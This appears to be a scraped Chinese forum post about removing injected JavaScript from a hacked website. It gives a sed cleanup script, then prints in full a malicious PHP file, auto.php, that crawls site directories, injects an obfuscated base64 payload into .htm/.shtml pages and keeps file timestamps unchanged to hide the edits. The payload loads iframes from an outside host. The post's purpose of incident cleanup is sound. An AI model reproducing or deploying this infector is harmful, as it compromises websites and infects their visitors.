用shell命令删除网站最新nb挂马的方法与代码
<p class="codetitle"><span style="text-decoration:underline;">复制代码</span> 代码如下:</p><p class="codebody"><br/>#</p><p><br/>
确实很让人头痛,还是编写shell 脚本把这些脚本去掉</p><p class="codetitle"><span style="text-decoration:underline;">复制代码</span> 代码如下:</p><p class="codebody"><br/>
#!/bin/sh<br/>
ls $1/*.htm | while read file<br/>
do<br/>
sed -i -e "/if(document.cookie.indexOf('helio'/d; /eval(function(p,a,c,k,e,d)/d;" $file<br/>
done</p><p><br/>
但是第二天还是有<br/><br/>
最后偶然发现 网站中有个auto.php 文件比较可疑<br/>
查看下内容,果然是木马的根源<br/>
下面是其内容,希望对大家有所帮助</p><p class="codetitle"><span style="text-decoration:underline;">复制代码</span> 代码如下:</p><p class="codebody"><br/><?php<br/>
error_reporting(E_ERROR);<br/>
set_time_limit(0);<br/>
function CheckPath($path)<br/>
{<br/>
return str_replace('//','/',str_replace('\\','/',$path));<br/>
}<br/>
function AutoRead($filename)<br/>
{<br/>
$handle = @fopen($filename,"rb");<br/>
$filecode = @fread($handle,@filesize($filename));<br/>
@fclose($handle);<br/>
return $filecode;<br/>
}<br/>
function AutoWrite($filename, $filecode ,$filemode)<br/>
{<br/>
$time = @filemtime($filename);<br/>
$handle = @fopen($filename,$filemode);<br/>
$key = @fwrite($handle,"\r\n".$filecode."\r\n");<br/>
if(!$key)<br/>
{<br/>
@chmod($filename,0666);<br/>
$key = @fwrite($handle,"\r\n".$filecode."\r\n");<br/>
}<br/>
@fclose($handle);<br/>
@touch($filename,$time);<br/>
return $key ? true : false;<br/>
}<br/>
function make_pass($length)<br/>
{<br/>
$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";<br/>
$str = "";<br/>
while(strlen($str) < $length)<br/>
{<br/>
$str .= substr($possible,(rand() % strlen($possible)),1);<br/>
}<br/>
return $str;<br/>
}<br/>
function AutoRun($dir)<br/>
{<br/>
$spider = @opendir($dir);<br/>
while($file = @readdir($spider))<br/>
{<br/>
if($file == '.' || $file == '..' || $file == 'a' || $file == 'images' || $file == 'uploads' || $file == 'special' || $file == 'data' || $file == 'include' || $file == 'member' || $file == 'templets' || $file == 'install') continue;<br/>
$code = base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCmlmKGRvY3VtZW50LmNvb2tpZS5pbmRleE9mKCdoZWxpbycpPT0tMSl7dmFyIGV4cGlyZXM9bmV3IERhdGUoKTtleHBpcmVzLnNldFRpbWUoZXhwaXJlcy5nZXRUaW1lKCkrMSo2MCo2MCoxMDAwKTtkb2N1bWVudC5jb29raWU9J2hlbGlvPVllcztwYXRoPS87ZXhwaXJlcz0nK2V4cGlyZXMudG9HTVRTdHJpbmcoKQ0KZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKWRbZShjKV09a1tjXXx8ZShjKTtrPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKWlmKGtbY10pcD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSk7cmV0dXJuIHB9KCc1LmwoXCc8aCBmPWIgaT04Oi8vbS5uLjYuNC9hL2ouZD48L2g+PDkgNz0wIGs9MSBpPSI4Oi8vbS5uLjYuNC9hL2UuYz8yIj48Lzk+PDkgNz0wIGs9MSBpPSI4Oi8vbS5uLjYuNC9hL2cuYz8zIj48Lzk+XCcpJyw2MiwyNCwnfDEwMHw=');<br/>
$code .= make_pass(3);<br/>
$code .= '|';<br/>
$code .= make_pass(3);<br/>
$code .= base64_decode('fGNufGRvY3VtZW50fGdvdnxoZWlnaHR8aHR0cHxpZnJhbWV8aW1hZ2VzfGphdmFzY3JpcHR8anBnfGpzfGtpc3N8bGFuZ3VhZ2V8bWlzc3xzY3JpcHR8c3JjfHViYnx3aWR0aHx3cml0ZWxufHd3d3x4Y3JzcmMnLnNwbGl0KCd8JyksMCx7fSkpO30NCjwvc2NyaXB0Pg0KPC9oZWFkPg==');<br/>
die($code);<br/>
$filename = CheckPath($dir.'/'.$file);<br/>
if(is_dir($filename)) AutoRun($filename);<br/>
if(eregi('\.htm|\.shtml',$file))<br/>
{<br/>
$checkcode = AutoRead($filename);<br/>
if((!stristr($checkcode,'eval(function(')) && stristr($checkcode,''))<br/>
{<br/>
$newcode = str_replace('',$code,$checkcode);<br/>
echo AutoWrite($filename, $newcode, "wb") ? "ok:".$filename."<br/>\n" : "err:".$filename."<br/>\n";<br/>
ob_flush();<br/>
flush();<br/>
}<br/>
}<br/>
$checkcode = NULL;<br/>
$newcode = NULL;<br/>
}<br/>
@closedir($spider);<br/>
return true;<br/>
}<br/>
if(isset($_GET['dir']))<br/>
{<br/>
AutoRun($_GET['dir']);<br/>
}<br/>
echo 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'].'?dir='.CheckPath(dirname(__FILE__));<br/>
?></p>
頁:
[1]